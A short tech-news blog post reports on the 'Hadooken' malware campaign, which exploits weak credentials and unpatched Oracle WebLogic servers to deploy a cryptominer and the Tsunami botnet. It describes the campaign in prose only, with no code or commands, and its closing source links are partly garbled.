Thursday, November 21, 2024

New Malware Targets Oracle WebLogic Servers, Exploiting Vulnerabilities to Mine Cryptocurrency

A new malware campaign targeting Oracle WebLogic servers has been identified, exploiting vulnerabilities in Linux environments to mine cryptocurrency and launch distributed denial-of-service (DDoS) attacks. Dubbed “Hadooken,” this malware was discovered by Aqua Security researchers. It infiltrates systems through weak credentials or unpatched Oracle WebLogic servers, which are commonly used in enterprise environments for critical applications.

Hadooken operates by deploying two payloads: a shell script and a Python script. These scripts retrieve the malware from remote servers, and once inside, Hadooken performs several malicious actions, including mining cryptocurrency and distributing the Tsunami botnet. The Tsunami botnet has a history of targeting services like Oracle WebLogic and Jenkins, often deployed in Kubernetes clusters. It is particularly dangerous due to its ability to launch both cryptomining operations and DDoS attacks.

One of the malware’s strategies involves creating cron jobs to ensure persistence, running the cryptominer at random intervals while blending its malicious activities with legitimate system processes. Additionally, it wipes system logs to make detection and forensic analysis more difficult.

This attack highlights the importance of keeping systems updated and properly configured, especially as Hadooken exploits known vulnerabilities in Oracle WebLogic servers. The infrastructure behind the attack is linked to Aeza International LTD, a known bulletproof hosting provider involved in previous cryptomining and ransomware campaigns.

For more details, you can refer to the sources from Aqua Security and BleepingComputer (

BleepingComputer)tps:/​(

CyberMaterial –)ingcomputer.com/news/security/new-linux-malware-hadooken-targets-oracle-weblogic-servers/) and here.

Aiden Thomas
Aiden Thomas
Aiden Thomas is a tech enthusiast and expert, writing comprehensive articles on a wide range of technology topics. From the latest gadgets and software innovations to in-depth reviews and industry trends, Aiden's content keeps readers informed and ahead of the curve. His passion for technology shines through in his clear and engaging writing, making complex tech accessible to everyone.
RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Most Popular